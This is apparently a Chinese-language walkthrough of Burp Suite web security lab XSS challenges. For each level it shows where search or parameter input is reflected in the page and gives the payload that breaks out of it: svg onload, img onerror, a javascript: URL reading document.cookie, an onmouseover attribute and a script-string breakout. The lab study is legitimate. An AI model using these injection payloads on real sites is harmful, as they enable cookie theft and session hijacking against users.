XSS-burp靶场

第三关 "><svg onload=alert(1)>

• 首先在搜索框中输入xx，f12查看元素，找到相关xx出现的地方进行分析，发现其出现在一个img标签内

<img src="/resources/images/tracker.gif?searchTerms=xx">
我们先进行闭合：
"><svg onload=alert(1)>

第四关：<img src=1 onerror=alert(1)>

首先也是在搜索框录入aaaa，f12查看出现位置如下：
<span id="searchMessage">aaaaaaa</span>
搜索框录入:<img src=1 onerror=alert(1)>
该src属性的值无效并引发错误。这会触发onerror事件处理程序，然后调用该alert()函数。因此，每当用户的浏览器尝试加载包含恶意帖子的页面时，就会执行有效负载。
搜索后，f12查看如下：
<span id="searchMessage"><img src="1" onerror="alert(123)"></span>

第五关：javascript:alert(document.cookie)

image.png

在提交反馈页面上，将查询参数更改returnPath为/后跟随机字母数字字符串。
右键单击并检查该元素，并观察您的随机字符串已放置在 ahref属性内。
改成returnPath：
javascript:alert(document.cookie)
按 Enter 键并单击“返回”。

<div class="is-linkback">
      <a id="backLink" href="javascript:alert(document.cookie)">Back</a>
</div>
点击页面的back触发

第七关："onmouseover="alert(1)

第七关会对><进行html编码，我们录入aaa查看，其出现在input标签的带引号的属性值中，于是创造一个onmouseover属性，鼠标移动到其上调用属性值
前面的引号是为了闭合前面的属性值
"onmouseover="alert(1)

第九关：';alert(1);//

录入aaaa查询其出现的位置，我们看到如下的位置：
<script>
      var searchTerms = 'aaaa';
      document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
所以我们录入';alert(1);//
查询后f12结果就变成这样：
<script>
       var searchTerms = '';
       alert(1);//';
      document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">')
</script>